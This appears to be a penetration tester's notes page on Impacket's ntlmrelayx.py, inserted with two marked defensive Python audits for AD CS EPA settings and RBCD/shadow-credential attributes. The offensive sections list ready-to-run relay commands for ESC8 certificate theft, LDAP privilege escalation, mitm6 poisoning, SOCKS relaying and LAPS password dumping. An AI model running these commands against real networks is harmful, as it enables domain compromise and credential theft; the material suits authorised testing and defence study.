# ntlmrelayx.py

ntlmrelayx.py is part of Impacket.

# Logging output

ntlmrelayx YOUR-COMMANDS --output-file output.log

Need to revisit this - I think this only captures hashes

# Relaying with ADCS ESC8 attack

ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'
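From the defensive side, ESC8 only works because the web enrollment endpoint accepts NTLM over plain HTTP without Extended Protection for Authentication (EPA). The following is an added example (not part of this page or of Impacket) that audits an IIS applicationHost.config fragment for the two settings that close the relay path: `sslFlags` containing `Ssl` on the CertSrv location, and `extendedProtection tokenChecking="Require"` under `windowsAuthentication`. Both attribute names are real IIS schema; the two config snippets and the site path are constructed samples.

```python
"""Audit an IIS applicationHost.config fragment for the hardening that blocks
NTLM relay to the AD CS web enrollment endpoint (/certsrv): TLS required and
Extended Protection for Authentication (EPA) set to Require.
The config snippets below are constructed samples, not taken from a real CA."""
import xml.etree.ElementTree as ET

# Constructed sample: default-style CertSrv location, reachable over HTTP, no EPA.
WEAK_CONFIG = """<configuration>
  <location path="Default Web Site/CertSrv">
    <system.webServer>
      <security>
        <access sslFlags="None" />
        <authentication>
          <anonymousAuthentication enabled="false" />
          <windowsAuthentication enabled="true" />
        </authentication>
      </security>
    </system.webServer>
  </location>
</configuration>"""

# Constructed sample: same location with TLS enforced and EPA required.
HARDENED_CONFIG = """<configuration>
  <location path="Default Web Site/CertSrv">
    <system.webServer>
      <security>
        <access sslFlags="Ssl" />
        <authentication>
          <anonymousAuthentication enabled="false" />
          <windowsAuthentication enabled="true">
            <extendedProtection tokenChecking="Require" flags="None" />
          </windowsAuthentication>
        </authentication>
      </security>
    </system.webServer>
  </location>
</configuration>"""


def _child(elem, *tags):
    """Walk down by exact child tag names (IIS tags such as system.webServer contain dots)."""
    for tag in tags:
        if elem is None:
            return None
        elem = next((c for c in elem if c.tag == tag), None)
    return elem


def audit_certsrv(config_xml, site_path="Default Web Site/CertSrv"):
    """Return a list of findings for the CertSrv location; an empty list means hardened."""
    root = ET.fromstring(config_xml)
    loc = next((l for l in root.iter("location") if l.get("path") == site_path), None)
    if loc is None:
        return ["no <location> element for %s" % site_path]
    findings = []

    # 1. TLS must be required, otherwise NTLM can be relayed over plain HTTP.
    access = _child(loc, "system.webServer", "security", "access")
    ssl_flags = access.get("sslFlags", "None") if access is not None else "None"
    if "Ssl" not in [f.strip() for f in ssl_flags.split(",")]:
        findings.append("HTTPS not required (sslFlags=%s)" % ssl_flags)

    # 2. EPA must be Require so the NTLM exchange is bound to the TLS channel.
    win = _child(loc, "system.webServer", "security", "authentication", "windowsAuthentication")
    if win is None or win.get("enabled", "false").lower() != "true":
        findings.append("windowsAuthentication not enabled; check which scheme is in use")
    else:
        epa = _child(win, "extendedProtection")
        token = epa.get("tokenChecking", "None") if epa is not None else "None"
        if token != "Require":
            findings.append("EPA tokenChecking=%s (relayed auth not channel-bound)" % token)
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_certsrv(cfg) or "OK")
```

Run it against a real applicationHost.config exported from the CA host; a clean result on the CertSrv location is the check to re-run after applying the Microsoft guidance for this relay.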

# Escalate privileges via relay

If you've already added a computer record to the environment (using something like Powermad), you may be able to relay to LDAP and assign escalated privileges to that computer object. For example:

ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$

Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!

# Delegate access attack while poisoning with mitm6

ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access

# Set up a SOCKS relay to a list of hosts

In this example we have a targets.txt file full of entries like this:

smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6

We set up the SOCKS relay like so:

ntlmrelayx.py -tf targets.txt -smb2support -socks

# Dumping LAPS passwords

If you want to just set up a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify that you want to dump LAPS passwords:

ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps

# Shadow Credentials attack

My favorite write-up on this attack is probably this one from GuidePoint Security.

# Find hosts with WebClient running

The webclientservicescanner works well for this.

# Add a rogue DNS record pointing to your machine

Try dnstool.py for this.

# Set up the relay for the Shadow Credentials attack

ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
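Both the delegate-access relay above and the shadow credentials relay leave a footprint on the target computer object: `--delegate-access` writes a security descriptor into `msDS-AllowedToActOnBehalfOfOtherIdentity` (resource-based constrained delegation), and `--shadow-credentials` appends a DN-binary value to `msDS-KeyCredentialLink`. The following is an added example (not from this page or from Impacket) that audits computer records for either attribute and reports which principal was granted access. It parses the real on-the-wire formats (self-relative `SECURITY_DESCRIPTOR` with an `ACCESS_ALLOWED_ACE` DACL, and `B:<hexlen>:<hex>:<DN>` DN-binary strings); the records, SIDs, DNs and the `build_rbcd_sd` fixture builder are constructed sample data.

```python
"""Audit computer objects for the two footprints the LDAP relay attacks leave:
an msDS-AllowedToActOnBehalfOfOtherIdentity descriptor (RBCD, --delegate-access)
and msDS-KeyCredentialLink entries (shadow credentials, --shadow-credentials).
All records, SIDs and DNs below are constructed samples, not a directory export."""
import struct


def parse_sid(buf, off):
    """Decode a binary SID at buf[off:]; return (sid_string, bytes_consumed)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def rbcd_principals(sd):
    """Return the SIDs granted by ACCESS_ALLOWED_ACEs in the DACL of a self-relative
    security descriptor, i.e. the accounts allowed to delegate to this computer."""
    if not sd:
        return []
    # SECURITY_DESCRIPTOR: Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    _rev, _sbz, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & 0x0004 or dacl_off == 0:  # SE_DACL_PRESENT not set or no DACL
        return []
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    _arev, _asbz, _asize, ace_count, _asbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    sids, off = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == 0x00:  # ACCESS_ALLOWED_ACE: header(4) + Mask(4) + SID
            sid, _ = parse_sid(sd, off + 8)
            sids.append(sid)
        off += ace_size
    return sids


def key_credential_links(values):
    """Parse DN-binary msDS-KeyCredentialLink values ('B:<hexlen>:<hex>:<DN>')
    and return the DN each key blob is attached to."""
    out = []
    for v in values:
        tag, hexlen, blob, dn = v.split(":", 3)
        if tag != "B" or len(blob) != int(hexlen):
            raise ValueError("malformed DN-binary value: %r" % v)
        out.append(dn)
    return out


def audit(records):
    """Return (computer, kind, principal) tuples for every RBCD grant or key link found."""
    findings = []
    for r in records:
        name = r["sAMAccountName"]
        for sid in rbcd_principals(r.get("msDS-AllowedToActOnBehalfOfOtherIdentity", b"")):
            findings.append((name, "RBCD", sid))
        for dn in key_credential_links(r.get("msDS-KeyCredentialLink", [])):
            findings.append((name, "KeyCredentialLink", dn))
    return findings


# --- constructed fixture below: builds a minimal RBCD descriptor for the sample ---
def _sid_bytes(sid):
    parts = [int(p) for p in sid.split("-")[1:]]
    rev, auth, subs = parts[0], parts[1], parts[2:]
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def build_rbcd_sd(sids):
    """Constructed fixture: self-relative SD with one ACCESS_ALLOWED_ACE per SID, no owner/group/SACL."""
    aces = b""
    for s in sids:
        body = struct.pack("<I", 0x000F01FF) + _sid_bytes(s)  # full-control mask (sample value)
        aces += struct.pack("<BBH", 0x00, 0x00, 4 + len(body)) + body
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces  # ACL_REVISION_DS
    return struct.pack("<BBHIIII", 1, 0, 0x0004 | 0x8000, 0, 0, 0, 20) + acl  # DACL_PRESENT|SELF_RELATIVE


# Constructed sample records; SIDs and DNs are placeholders.
SAMPLE = [
    {"sAMAccountName": "DC01$"},
    {"sAMAccountName": "FILESRV$",
     "msDS-AllowedToActOnBehalfOfOtherIdentity": build_rbcd_sd(["S-1-5-21-1111-2222-3333-1105"])},
    {"sAMAccountName": "VICTIM$",
     "msDS-KeyCredentialLink": ["B:8:deadbeef:CN=VICTIM,OU=Servers,DC=domain,DC=com"]},
]

if __name__ == "__main__":
    for name, kind, who in audit(SAMPLE):
        print("%s: %s -> %s" % (name, kind, who))
```

In a real environment, feed `audit()` the raw attribute values returned by an LDAP search over computer objects (the RBCD attribute comes back as bytes, the key link as DN-binary strings); any SID that is not a known, approved service account, or any key link on a machine that was never enrolled for Windows Hello for Business, is worth an incident ticket.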

# Trigger HTTP auth from VICTIMS

Head to our coercer page for more info.